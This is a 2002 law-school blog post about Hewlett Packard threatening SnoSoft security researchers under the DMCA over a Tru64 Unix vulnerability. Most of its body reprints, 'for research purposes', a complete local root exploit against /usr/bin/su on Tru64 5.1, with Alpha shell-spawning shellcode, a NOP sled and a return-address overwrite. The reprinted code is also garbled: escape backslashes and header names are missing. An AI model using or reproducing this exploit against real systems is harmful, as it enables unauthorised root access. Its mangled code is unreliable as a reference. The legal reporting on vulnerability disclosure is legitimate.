LawMeme LawMeme Yale Law School  
LawMeme
Search LawMeme [ Advanced Search ]
 
 
 
 
HP Uses DMCA to Halt Security Researchers
Posted by Raul Ruiz on Tuesday, July 30 @ 23:40:42 EDT Digital Millennium Copyright Act

C|NET is reporting that Hewlett Packard is using the DMCA to threaten a team of researchers who disseminated information pertaining to a buffer overflow vulnerability in HP's Tru64 Unix operating system. A researcher at SnoSoft posted a link to the source code via SecurityFocus.com's Bugtraq mailing list.

In his letter to SnoSoft, Kent Ferson, Vice President of HP's UNIX Systems Unit, claims that SnoSoft is violating the DMCA as well as the Computer Fraud and Abuse Act. For research purposes, I post the source code below so that users may see what a buffer overflow is.



The source code to this exploit almost seems routine in the sense that it is the traditional buffer overflow. Buffer overflows occur when a program writes data beyond the end of a buffer. While simple buffer overflows will cause a segmentation fault, experienced programs can saturate the buffer enough to overwrite the program's instruction pointer, a pointer that tells the program what to do next. How does this program tell override the pointer and tell the computer what to do next? It injects program code into the buffer by way of the shellcode[] array. The implementation is below.

/*
 /bin/su tru64 5.1
 works with non-exec stack enabled
 
 stripey is the man

 developed at http://www.snosoft.com in the cerebrum labs

 phased
 phased at mail.ru
*/

#include 
#include 
#include 
#include 

char shellcode[]=
	"x30x15xd9x43"      /* subq $30,200,$16             */
	"x11x74xf0x47"      /* bis $31,0x83,$17             */
	"x12x14x02x42"      /* addq $16,16,$18              */
	"xfcxffx32xb2"      /* stl $17,-4($18)              */
	"x12x94x09x42"      /* addq $16,76,$18              */
	"xfcxffx32xb2"      /* stl $17,-4($18)              */
	"xffx47x3fx26"      /* ldah $17,0x47ff($31)         */
	"x1fx04x31x22"      /* lda $17,0x041f($17)          */
	"xfcxffx30xb2"      /* stl $17,-4($16)              */
	"xf7xffx1fxd2"      /* bsr $16,-32                  */
	"x10x04xffx47"      /* clr $16                      */
	"x11x14xe3x43"      /* addq $31,24,$17              */
	"x20x35x20x42"      /* subq $17,1,$0                */
	"xffxffxffxff"      /* callsys ( disguised )        */
	"x30x15xd9x43"      /* subq $30,200,$16             */
	"x31x15xd8x43"      /* subq $30,192,$17             */
	"x12x04xffx47"      /* clr $18                      */
	"x40xffx1exb6"      /* stq $16,-192($30)            */
	"x48xffxfexb7"      /* stq $31,-184($30)            */
	"x98xffx7fx26"      /* ldah $19,0xff98($31)         */
	"xd0x8cx73x22"      /* lda $19,0x8cd0($19)          */
	"x13x05xf3x47"      /* ornot $31,$19,$19            */
	"x3cxffx7exb2"      /* stl $19,-196($30)            */
	"x69x6ex7fx26"      /* ldah $19,0x6e69($31)         */
	"x2fx62x73x22"      /* lda $19,0x622f($19)          */
	"x38xffx7exb2"      /* stl $19,-200($30)            */
	"x13x94xe7x43"      /* addq $31,60,$19              */
	"x20x35x60x42"      /* subq $19,1,$0                */
	"xffxffxffxff";     /* callsys ( disguised )        */

/* shellcode by Taeho Oh */

main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "x1fx04xffx47";

bzero(&buffer, 8239);
bzero(&payload, 15200);

for (i=0;i<8233;i++)
        buffer[i] = 0x41;

/* 0x140010401 */

        buffer[i++] = 0x01;
        buffer[i++] = 0x04;
        buffer[i++] = 0x01;
        buffer[i++] = 0x40;
        buffer[i++] = 0x01;

for (i=0;i<15000;) {
	for(j=0;j<4;j++)  {
        	payload[i++] = nop[j];
	}
}

for (i=i,j=0;j<sizeof(shellcode);i++,j++)
	payload[i] = shellcode[j];

	printf("/bin/su by phased
");
	printf("payload %db
", strlen(payload));
	printf("buffer %db
", strlen(buffer));

	execl("/usr/bin/su", "su", buffer, payload, 0);

}

 
Login
Nickname

Password

Don't have an account yet? You can create one. As registered user you have some advantages like theme manager, comments configuration and post comments with your name.
Related Links
· C|NET
· reporting
· Hewlett Packard
· DMCA
· Tru64 Unix operating system
· SnoSoft
· source code
· SecurityFocus.com's
· Bugtraq mailing list
· letter to SnoSoft
· Computer Fraud and Abuse Act
· More about Digital Millennium Copyright Act
· News by Raul Ruiz


Most read story about Digital Millennium Copyright Act:
Analysis of BNETD and Blizzard

Article Rating
Average Score: 5
Votes: 3


Please take a second and vote for this article:

Bad
Regular
Good
Very Good
Excellent


Options

Printer Friendly Page  Printer Friendly Page

Send to a Friend  Send to a Friend
"User's Login" | Login/Create an Account | 1 comment
Threshold
  
The comments are owned by the poster. We aren't responsible for their content.
HP Bacsk Down (Score: 1)
by Rob_Heverly (robert.heverly-at-yale.edu) on Thursday, August 01 @ 23:00:07 EDT
(User Info | Send a Message) http://www.law.yale.edu/isp/
Declan McCullagh is reporting that HP has seriously backed away from its DMCA threats.


[ Reply to This ]


Leges humanae nascuntur, vivunt, moriuntur
Human laws are born, live, and die


All stories, comments and submissions copyright their respective posters.
Everything Else Copyright (c) 2002 by the Information Society Project.
This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, v1.0 or later (the latest version is presently available at http://www.opencontent.org/openpub/).

You can syndicate our news using the file backend.php